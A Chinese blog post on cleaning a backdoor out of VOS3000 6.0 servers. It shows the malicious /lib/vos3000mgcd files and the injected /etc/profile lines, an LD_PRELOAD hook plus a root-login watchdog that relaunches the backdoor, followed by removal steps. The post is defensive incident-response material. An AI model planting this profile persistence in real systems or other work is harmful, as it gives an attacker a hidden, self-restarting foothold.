VOS3000 6.0 后门清除

由 jafucong 发布

背景

帮朋友做 VOS 服务器维护时,发现 VOS3000 4.0 与 VOS3000 6.0 均有后门。此后门触发时会下载一个后门程序,该程序运行后 VOS 进程将无法启动。

下面将介绍VOS6.0中如何清理及拦截此后门。

后门位置

  1. /lib 目录下有两个文件:vos3000mgcd 和 vos3000mgcd.so
执行 sudo ps aux 可发现以下两个进程(第一个即后门进程,第二个是正常的 VOS 服务进程):

root      2676  1.6  0.1 796408 15868 pts/1    Sl   19:36   0:00 /lib/vos3000mgcd
root      3112  0.8  0.8 372776 70348 ?        Sl   19:47   0:09 /home/kunshi/vos3000/server/bin/vos3000server -x 1500 -r /home/kunshi/.run/vos3000server.pid
  2. 并且修改了 /etc/profile 文件,内容如下:
# /etc/profile

# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrc

# It's NOT a good idea to change this file unless you know what you
# are doing. It's much better to create a custom.sh shell script in
# /etc/profile.d/ to make custom changes to your environment, as this
# will prevent the need for merging in future updates.

# Prepend (default) or append ("after" as $2) directory $1 to PATH,
# unless PATH already contains it as a complete component.
pathmunge () {
    case ":${PATH}:" in
        *:"$1":*)
            # already present: leave PATH untouched
            return
            ;;
    esac
    if [ "$2" = "after" ] ; then
        PATH=$PATH:$1
    else
        PATH=$1:$PATH
    fi
}


# Derive the login identity from id(1) when it is available.
if [ -x /usr/bin/id ]; then
    if [ -z "$EUID" ]; then
        # ksh workaround: the shell did not set EUID itself, so take the
        # effective and real uid from id(1). bash sets EUID on its own (and
        # marks it read-only), so this branch is skipped there.
        EUID=$(/usr/bin/id -u)
        UID=$(/usr/bin/id -ru)
    fi
    USER=$(/usr/bin/id -un)
    LOGNAME=$USER
    MAIL=/var/spool/mail/$USER
fi

# Path manipulation: root gets the sbin directories in front of PATH,
# everyone else gets them appended so existing entries keep precedence.
case "$EUID" in
    0)
        pathmunge /sbin
        pathmunge /usr/sbin
        pathmunge /usr/local/sbin
        ;;
    *)
        pathmunge /usr/local/sbin after
        pathmunge /usr/sbin after
        pathmunge /sbin after
        ;;
esac

# Host name (empty if hostname(1) is missing), history size and history
# de-duplication policy; an existing "ignorespace" is widened to "ignoreboth".
HOSTNAME=$(/bin/hostname 2>/dev/null)
HISTSIZE=1000
case "$HISTCONTROL" in
    ignorespace) export HISTCONTROL=ignoreboth ;;
    *)           export HISTCONTROL=ignoredups ;;
esac

export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE HISTCONTROL
# --- Injected persistence: not part of the stock /etc/profile (see the
# cleanup steps below, which delete exactly these lines) ---
# Makes the dynamic loader map /lib/vos3000mgcd.so into every dynamically
# linked program started from this login environment. With LD_PRELOAD empty
# beforehand the value becomes ":/lib/vos3000mgcd.so", which is what the
# `export` dump further down shows.
export LD_PRELOAD=$LD_PRELOAD:/lib/vos3000mgcd.so
# Watchdog, root logins only: if no vos3000mgcd process appears in ps(1),
# relaunch /lib/vos3000mgcd detached (nohup, backgrounded, output discarded).
# Every root login therefore restarts it, so killing the process without
# removing these lines is not enough.
if [ "$EUID" -eq 0 ]
then
# The JAVA_JAR=0 prefix on each command is not explained by anything in this
# file; presumably a marker the preloaded library checks to leave these
# commands alone -- unconfirmed, treat it as an indicator rather than a contract.
JAVA_JAR=0 ps -fe|JAVA_JAR=0 grep vos3000mgcd |JAVA_JAR=0 grep -v grep >/dev/null
if [ $? -ne 0 ]
then
JAVA_JAR=0 nohup /lib/vos3000mgcd >/dev/null 2>&1 &
fi
fi

# By default, we want umask to get set. This sets it for login shell
# Current threshold for system reserved uid/gids is 200
# You could check uidgid reservation validity in
# /usr/share/doc/setup-*/uidgid file
#
# Start from the conservative 022 and relax to 002 only for non-system
# accounts whose primary group is their own private group.
umask 022
if [ "$UID" -gt 199 ] && [ "$(/usr/bin/id -gn)" = "$(/usr/bin/id -un)" ]; then
    umask 002
fi

# Source the readable drop-in scripts. In an interactive shell ("$-" contains
# the i flag) their output is shown; otherwise it is discarded.
for i in /etc/profile.d/*.sh ; do
    [ -r "$i" ] || continue
    case "$-" in
        *i*) . "$i" ;;
        *)   . "$i" >/dev/null 2>&1 ;;
    esac
done

# Do not leak the loop variable or the helper into the login environment.
unset i
unset -f pathmunge
  3. 环境变量(`export` 的输出):
declare -x G_BROKEN_FILENAMES="1"
declare -x HISTCONTROL="ignoredups"
declare -x HISTSIZE="1000"
declare -x HOME="/root"
declare -x HOSTNAME="VOS3000"
declare -x LANG="zh_CN.UTF-8"
declare -x LD_PRELOAD=":/lib/vos3000mgcd.so"  <-------后门预加载库(由 /etc/profile 中的 export LD_PRELOAD 注入)
declare -x LESSOPEN="||/usr/bin/lesspipe.sh %s"
declare -x LOGNAME="root"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;05;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.tbz=01;31:*.tbz2=01;31:*.bz=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.axa=01;36:*.oga=01;36:*.spx=01;36:*.xspf=01;36:"
declare -x MAIL="/var/spool/mail/root"
declare -x OLDPWD="/"
declare -x PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
declare -x PWD="/lib"
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.3.120 1181 22"
declare -x SSH_CONNECTION="192.168.3.120 1181 192.168.3.100 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm"
declare -x USER="root"

清除步骤

建议将以下步骤做成开机自启动脚本并定时检查:因为后门程序内嵌在 VOS 主体程序中,清理后仍可能被再次释放。
  1. 取消当前会话中的环境变量(仅对当前 shell 生效):

    unset LD_PRELOAD
  2. 杀死相关进程(即上面 ps 输出中的 /lib/vos3000mgcd;已通过 LD_PRELOAD 加载了该 .so 的进程需要重启才会卸载)
  3. 删除相关文件

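    # Record the samples' hashes first so they can still be analysed or
    # matched elsewhere after removal.
    sudo sha256sum /lib/vos3000mgcd /lib/vos3000mgcd.so
    # Both paths are plain files, so -r is not needed; -- stops option parsing
    # in case a path ever starts with '-'.
    sudo rm -f -- /lib/vos3000mgcd /lib/vos3000mgcd.so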
  4. 还原文件 /etc/profile: 删除以下部分:

    export LD_PRELOAD=$LD_PRELOAD:/lib/vos3000mgcd.so
    if [ "$EUID" -eq 0 ]
    then
    JAVA_JAR=0 ps -fe|JAVA_JAR=0 grep vos3000mgcd |JAVA_JAR=0 grep -v grep >/dev/null
    if [ $? -ne 0 ]
    then
    JAVA_JAR=0 nohup /lib/vos3000mgcd >/dev/null 2>&1 &
    fi
    fi

修改后执行 source /etc/profile 重新加载配置。

  5. 重启 VOS 服务。
